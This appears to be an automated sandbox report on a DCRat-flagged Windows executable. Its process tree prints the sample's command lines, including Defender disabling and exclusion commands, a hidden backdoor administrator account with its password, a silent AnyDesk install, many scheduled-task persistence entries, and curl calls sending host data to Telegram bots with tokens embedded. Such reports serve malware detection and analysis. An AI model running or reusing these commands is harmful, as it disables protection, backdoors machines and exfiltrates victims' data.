Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
12-01-2023 13:42
General
-
Target
migrate.120.exe
-
Size
15.7MB
-
MD5
b27e540aef37c99f3cfd2766c2e61784
-
SHA1
c516b74daec17d1bc788c54433cf10899ee07e92
-
SHA256
28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479
-
SHA512
641d5daaef91d535f279ce7fea1f7c8b50ba87040480602e51951dfc2f3345699d3161d38b1b2ab7b3d4fbbcc56e0d597f125ed65ea3971df4888cb4a63897cd
-
SSDEEP
393216:XhBqJ0CE8/eXkkM7cGGBNpuXU8ysXVqNIyc2KBcr27eEHTPX:RBe0CiMihuXU8yYqNIygdrX
Malware Config
Extracted
https://ipinfo.io/ip
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 12 IoCs
-
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
DCRat payload 7 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 22 IoCs
-
Possible privilege escalation attempt 11 IoCs
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 3 IoCs
-
Modifies file permissions 1 TTPs 11 IoCs
-
Adds Run key to start application 2 TTPs 24 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 6 IoCs
-
Drops file in Windows directory 26 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 36 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 11 IoCs
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 21 IoCs
-
Modifies registry class 17 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 10 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\migrate.120.exe"C:\Users\Admin\AppData\Local\Temp\migrate.120.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\programdata\1.exe"C:\programdata\1.exe" /D2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "4⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /i "Platform"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\takeown.exetakeown /f c:\windows\tasks4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
- Suspicious behavior: EnumeratesProcesses
-
\??\c:\programdata\migrate.exec:\programdata\migrate.exe -p44324⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "5⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic" start WMService6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 2 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\net.exenet start WMService6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start WMService7⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 60 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC CPU Get Name /Value5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exeFindStr .5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC /Node:localhost Path Win32_VideoController Get Name /Value5⤵
-
C:\Windows\SysWOW64\find.exeFIND.EXE "="5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
\??\c:\windows\curl.exec:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="GBQHURCCCORE2Intel Core Processor (Broadwell)Microsoft Basic Display AdapterSERVICE WMService RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"4⤵
- Executes dropped EXE
-
C:\programdata\any.exe"C:\programdata\any.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\any.bat" "3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\net.exenet stop TaskSc4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TaskSc5⤵
-
C:\Windows\SysWOW64\net.exenet stop TaskScs4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TaskScs5⤵
-
C:\Windows\SysWOW64\net.exenet stop AnyDesk4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AnyDesk5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM anydesk.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wininit1.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent5⤵
-
C:\ProgramData\wsappz.exeC:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent6⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c echo Pass325524⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c echo Pass325525⤵
-
C:\ProgramData\AnyDesk\AnyDesk.exeC:\ProgramData\AnyDesk\anydesk.exe --set-password4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell cmd.exe /c C:\ProgramData\AnyDesk\anydesk.exe --get-id4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\ProgramData\AnyDesk\anydesk.exe --get-id5⤵
-
C:\ProgramData\AnyDesk\AnyDesk.exeC:\ProgramData\AnyDesk\anydesk.exe --get-id6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c find /n /v ""4⤵
-
C:\Windows\SysWOW64\find.exefind /n /v ""5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(new-object System.Net.WebClient).DownloadString('https://ipinfo.io/ip')"4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c find /n /v ""4⤵
-
C:\Windows\SysWOW64\find.exefind /n /v ""5⤵
-
\??\c:\windows\curl.exec:\windows\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="ANY_GBQHURCC'id:'"0"'ip:'"154.61.71.13"" "https://api.telegram.org/bot"5513453963:AAEqmVGigjirKuykDiL7YHcdVrBQ72q07Ss"/sendMessage"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exenet user oldadministrator "Pass32552" /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user oldadministrator "Pass32552" /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators oldadministrator /ADD4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators oldadministrator /ADD5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administradores oldadministrator /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administradores oldadministrator /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administratoren oldadministrator /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administratoren oldadministrator /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administrateurs oldadministrator /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrateurs oldadministrator /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup администраторы oldadministrator /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup администраторы oldadministrator /add5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f4⤵
-
C:\programdata\dc.exe"C:\programdata\dc.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\runtimeMonitor\PsYm20I.bat" "4⤵
-
C:\runtimeMonitor\ComdriverSvc.exe"C:\runtimeMonitor\ComdriverSvc.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/runtimeMonitor/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Common Files\System\Idle.exe"C:\Program Files\Common Files\System\Idle.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\runtimeMonitor\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\runtimeMonitor\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\runtimeMonitor\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\ProgramData\AnyDesk\AnyDesk.exe"C:\ProgramData\AnyDesk\AnyDesk.exe" --service1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\Downloads\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\taskhostw.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files\Windows NT\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Recent\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default\Recent\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Recent\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\runtimeMonitor\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\runtimeMonitor\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\runtimeMonitor\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wsappzw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\wsappz.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wsappz" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wsappz.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wsappzw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wsappz.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\odt\powershell.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\odt\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\odt\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\ProgramData\AnyDesk\AnyDesk.exe"C:\ProgramData\AnyDesk\AnyDesk.exe" --control1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Windows\Offline Web Pages\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\runtimeMonitor\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\runtimeMonitor\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files\Common Files\System\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\runtimeMonitor\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Offline Web Pages\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files\Common Files\System\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\tasks\Wmiic.exeC:\windows\tasks\Wmiic.exe1⤵
- Executes dropped EXE
-
C:\windows\tasks\IntelConfigService.exe"IntelConfigService.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Tasks\Wrap.exeC:\Windows\Tasks\Wrap.exe3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized4⤵
-
C:\Windows\Tasks\ApplicationsFrameHost.exeC:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"3⤵
-
